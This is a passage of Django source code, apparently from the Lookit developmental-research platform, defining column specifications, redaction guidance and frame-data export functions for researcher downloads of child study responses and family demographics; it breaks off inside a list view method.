from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
    """Specification of one column in a response/demographic data download.

    Couples a stable column ID with its data-dictionary description and an
    extractor callable that pulls the value from either a Response instance
    (RESPONSE_COLUMNS) or a queryset .values() dict (DEMOGRAPHIC_COLUMNS).
    """

    # Stable column identifier used as the CSV header, e.g. "response__uuid".
    id: str
    # Human-readable explanation written to the data-dictionary download.
    description: str
    # Pulls this column's value from a Response instance or a values() dict,
    # depending on which column list the instance belongs to.
    extractor: Callable[
        [Union[Response, Dict]], Union[str, List]
    ]
    # True when researchers may choose whether to include this column.
    optional: bool = False
    # Optional human-friendly display name (empty string when unset).
    name: str = ""
    # Whether an optional column is selected by default.
    # NOTE(review): inferred from the field name and sibling usage; confirm
    # against the download-form code before relying on it.
    include_by_default: bool = False
    # Marks columns whose values are identifying and need redaction before publication.
    identifiable: bool = False
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
    col.id
    for col in RESPONSE_COLUMNS
    # str.startswith accepts a tuple of prefixes: one test instead of two.
    if col.id.startswith(("child__", "participant__"))
]
# Column IDs flagged identifiable; these must be redacted before publication.
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
    selected_header_ids: Union[Set, List],
    all_available_header_ids: Union[Set, KeysView],
) -> List:
    """Assemble the ordered header list for a response data download.

    Standard columns (all but the final two RESPONSE_COLUMNS entries, i.e. the
    expanding sequence/condition columns) come first in definition order, with
    any optional columns the user did not select removed; every remaining
    available header follows in sorted order.
    """
    # Optional columns the researcher chose not to include.
    omitted = {
        column.id
        for column in RESPONSE_COLUMNS
        if column.optional and column.id not in selected_header_ids
    }
    # Fixed-position columns, in the order they are declared.
    leading = [
        column.id for column in RESPONSE_COLUMNS[:-2] if column.id not in omitted
    ]
    # Everything else (e.g. expanded sequence/condition headers), alphabetized.
    trailing = sorted(all_available_header_ids - set(leading) - omitted)
    return leading + trailing
def get_demographic_headers(selected_header_ids=None) -> List[str]:
    """Return IDs of demographic columns to include in a download.

    All required columns are always included; optional columns are included
    only when present in selected_header_ids.
    """
    chosen = selected_header_ids if selected_header_ids is not None else {}
    return [
        column.id
        for column in DEMOGRAPHIC_COLUMNS
        if not column.optional or column.id in chosen
    ]
def construct_response_dictionary(
    resp, columns, optional_headers, include_exp_data=True
):
    """Build a nested dictionary of column values for a single response.

    Column IDs of the form "group__field" are nested as {group: {field: value}};
    IDs without exactly one "__" separator become flat top-level keys. Optional
    columns are included only when listed in optional_headers (None -> none).
    When include_exp_data is true, the raw exp_data is attached as well.
    """
    if optional_headers is None:
        optional_headers = {}
    resp_dict = {}
    for col in columns:
        # Skip unselected optional columns.
        if col.optional and col.id not in optional_headers:
            continue
        try:
            group, field = col.id.split("__")
            resp_dict.setdefault(group, {})[field] = col.extractor(resp)
        except ValueError:
            # ID has no (or more than one) "__" separator: store it flat.
            resp_dict[col.id] = col.extractor(resp)
    if include_exp_data:
        resp_dict["exp_data"] = resp.exp_data
    return resp_dict
class FrameDataRow(NamedTuple):
    """One row of long-format frame data produced by get_frame_data.

    Field meanings are documented in FRAME_DATA_HEADER_DESCRIPTIONS;
    event_number is the empty string for non-event data.
    """

    response_uuid: str
    child_hashed_id: str
    frame_id: str
    event_number: str
    key: str
    value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
    """Flatten one response's data into long-format FrameDataRow records.

    Accepts either a Response instance or a dict with the keys built below
    (e.g. from a queryset .values() call); an instance is normalized to the
    dict form first. Produces one row per datum:

    * each key of each entry in global_event_timings, with frame_id "global"
      and the entry's index as event_number;
    * each flattened key of each frame in exp_data, with event-timing keys
      expanded so every event key gets its own row/event_number, and with
      frameType, exit-survey birthDate, and empty generatedProperties omitted.
    """
    # Normalize a model instance to the dict shape used below. isinstance
    # (rather than the previous exact type() check) also accepts dict
    # subclasses such as OrderedDict.
    if not isinstance(resp, dict):
        resp = {
            "child__uuid": resp.child.uuid,
            "study__uuid": resp.study.uuid,
            "study__salt": resp.study.salt,
            "study__hash_digits": resp.study.hash_digits,
            "uuid": resp.uuid,
            "exp_data": resp.exp_data,
            "global_event_timings": resp.global_event_timings,
        }
    frame_data_tuples = []
    # Study-specific hashed child ID (publication-safe, unlike the raw UUID).
    child_hashed_id = hash_id(
        resp["child__uuid"],
        resp["study__uuid"],
        resp["study__salt"],
        resp["study__hash_digits"],
    )
    # First add all of the global event timings as events with frame_id "global"
    for (iEvent, event) in enumerate(resp["global_event_timings"]):
        for (key, value) in event.items():
            frame_data_tuples.append(
                FrameDataRow(
                    child_hashed_id=child_hashed_id,
                    response_uuid=str(resp["uuid"]),
                    frame_id="global",
                    key=key,
                    event_number=str(iEvent),
                    value=value,
                )
            )
    # Next add all data in exp_data
    event_prefix = "eventTimings."
    for frame_id, frame_data in resp["exp_data"].items():
        for (key, value) in flatten_dict(frame_data).items():
            # Process event data separately and include event_number within frame
            if key.startswith(event_prefix):
                # Flattened key is "eventTimings.<event index>.<key...>".
                key_pieces = key.split(".")
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=str(resp["uuid"]),
                        frame_id=frame_id,
                        key=".".join(key_pieces[2:]),
                        event_number=str(key_pieces[1]),
                        value=value,
                    )
                )
            # omit frameType values from CSV
            elif key == "frameType":
                continue
            # Omit the DOB from any exit survey
            elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
                continue
            # Omit empty generatedProperties values from CSV
            elif key == "generatedProperties" and not value:
                continue
            # For all other data, create a regular entry with frame_id and no event #
            else:
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=str(resp["uuid"]),
                        frame_id=frame_id,
                        key=key,
                        event_number="",
                        value=value,
                    )
                )
    return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
    """Write the frame-data "data dictionary" CSV for a set of responses.

    Pass 1 scans every response's flattened frame data to discover frame IDs,
    the non-event keys used within each frame, and all event keys. Pass 2
    writes one description row per discovered item, using stock descriptions
    where known and RESEARCHER placeholders where a human must fill in
    study-specific detail.

    Args:
        writer: csv.DictWriter-like object accepting rows keyed by "column"/
            "description" and "possible_frame_id"/"possible_key"/
            "frame_description"/"key_description".
        responses: queryset (or sequence) of responses; paginated in chunks of
            RESPONSE_PAGE_SIZE to bound memory use.
    """
    response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
    unique_frame_ids = set()
    event_keys = set()
    unique_frame_keys_dict = {}
    for page_num in response_paginator.page_range:
        page_of_responses = response_paginator.page(page_num)
        for resp in page_of_responses:
            this_resp_data = get_frame_data(resp)
            # Frame IDs look like "<index>-<frame name>"; strip the index so
            # equivalent frames across responses collapse to a single entry.
            these_ids = {
                d.frame_id.partition("-")[2]
                for d in this_resp_data
                if not d.frame_id == "global"
            }
            # Rows with a non-empty event_number are event data.
            event_keys = event_keys | {
                d.key for d in this_resp_data if d.event_number != ""
            }
            unique_frame_ids = unique_frame_ids | these_ids
            for frame_id in these_ids:
                # Non-event keys observed for this frame in this response.
                these_keys = {
                    d.key
                    for d in this_resp_data
                    if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
                }
                if frame_id in unique_frame_keys_dict:
                    unique_frame_keys_dict[frame_id] = (
                        unique_frame_keys_dict[frame_id] | these_keys
                    )
                else:
                    unique_frame_keys_dict[frame_id] = these_keys
    # Start with general descriptions of high-level headers (child_id, response_id, etc.)
    writer.writerows(
        [
            {"column": header, "description": description}
            for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
        ]
    )
    writer.writerow(
        {
            "possible_frame_id": "global",
            "frame_description": "Data not associated with a particular frame",
        }
    )
    # Add placeholders to describe each frame type
    unique_frame_ids = sorted(list(unique_frame_ids))
    for frame_id in unique_frame_ids:
        writer.writerow(
            {
                "possible_frame_id": "*-" + frame_id,
                "frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
            }
        )
        unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
        for k in unique_frame_keys:
            writer.writerow(
                {
                    "possible_frame_id": "*-" + frame_id,
                    "possible_key": k,
                    "key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
                }
            )
    event_keys = sorted(list(event_keys))
    # Stock descriptions for event keys recorded by the frame player itself;
    # anything not listed here gets a RESEARCHER placeholder below.
    event_key_stock_descriptions = {
        "eventType": (
            "Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
            "cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
            "or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
            "find a list of events recorded by each frame in the frame documentation at "
            "https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
        ),
        "exitType": (
            "Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
        ),
        "lastPageSeen": (
            "Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
        ),
        "pipeId": (
            "Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
            "useful for troubleshooting in rare cases."
        ),
        "streamTime": (
            "Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
            "video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
        ),
        "timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
        "videoId": (
            "Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
            "currently being recorded."
        ),
    }
    for k in event_keys:
        writer.writerow(
            {
                "possible_frame_id": "any (event data)",
                "possible_key": k,
                "key_description": event_key_stock_descriptions.get(
                    k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
                ),
            }
        )
def build_single_response_framedata_csv(response):
    """Return CSV text containing the frame-level data for a single response."""
    frame_rows = get_frame_data(response)
    csv_buffer, csv_writer = csv_namedtuple_writer(FrameDataRow)
    csv_writer.writerows(frame_rows)
    return csv_buffer.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin giving download views a paginated queryset of the responses the
    requesting researcher is allowed to see for this study."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return this study's researcher-visible responses in the configured order."""
        visible_responses = self.study.responses_for_researcher(self.request.user)
        return visible_responses.order_by(self.get_ordering())
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin giving download views paginated demographic-snapshot data for the
    responses the requesting researcher is allowed to see."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return plain dicts (via ``.values()``) of demographic data per response.

        Limiting to the listed fields avoids instantiating full model objects
        and keeps only what the demographic download formats need.
        """
        study = self.study
        return (
            study.responses_for_researcher(self.request.user)
            .order_by(self.get_ordering())
            .select_related("child", "child__user", "study", "demographic_snapshot")
            .values(
                "uuid",
                "date_created",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
                "demographic_snapshot__uuid",
                "demographic_snapshot__created_at",
                "demographic_snapshot__number_of_children",
                "demographic_snapshot__child_birthdays",
                "demographic_snapshot__languages_spoken_at_home",
                "demographic_snapshot__number_of_guardians",
                "demographic_snapshot__number_of_guardians_explanation",
                "demographic_snapshot__race_identification",
                "demographic_snapshot__age",
                "demographic_snapshot__gender",
                "demographic_snapshot__education_level",
                "demographic_snapshot__spouse_education_level",
                "demographic_snapshot__annual_income",
                "demographic_snapshot__number_of_books",
                "demographic_snapshot__additional_comments",
                "demographic_snapshot__country",
                "demographic_snapshot__state",
                "demographic_snapshot__density",
                "demographic_snapshot__lookit_referrer",
                "demographic_snapshot__extra",
            )
        )
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
    """Paginated table of individual responses, with a per-response summary
    panel, video list, and editable feedback."""

    template_name = "studies/study_responses.html"

    def get_ordering(self):
        """Translate the ?sort= query param onto model fields.

        "id" sorts by the child's id rather than the response's, and "status"
        maps to the boolean ``completed`` field; a leading "-" is preserved.
        """
        orderby = self.request.GET.get("sort", "id")
        return orderby.replace("id", "child__id").replace("status", "completed")

    def get_queryset(self):
        """Prefetch consent rulings (with arbiter) and feedback, newest feedback first."""
        return (
            super()
            .get_queryset()
            .prefetch_related(
                "consent_rulings__arbiter",
                Prefetch(
                    "feedback",
                    queryset=Feedback.objects.select_related("researcher").order_by(
                        "-id"
                    ),
                ),
            )
        )

    def get_context_data(self, **kwargs):
        """Assemble per-response table rows, summary data, display-friendly
        video names, optional-column choices, and permission flags."""
        context = super().get_context_data(**kwargs)
        context["study"] = study = self.study
        paginated_responses = context["object_list"]
        columns_included_in_summary = study.columns_included_in_summary()
        # Columns shown in the main response table.
        columns_included_in_table = [
            "child__hashed_id",
            "response__uuid",
            "response__id",
            "response__status",
            "response__completed",
            "response__is_preview",
        ]
        response_data = []
        for resp in paginated_responses:
            # Info needed for table display of individual responses
            this_resp_data = {
                col.id: col.extractor(resp)
                for col in RESPONSE_COLUMNS
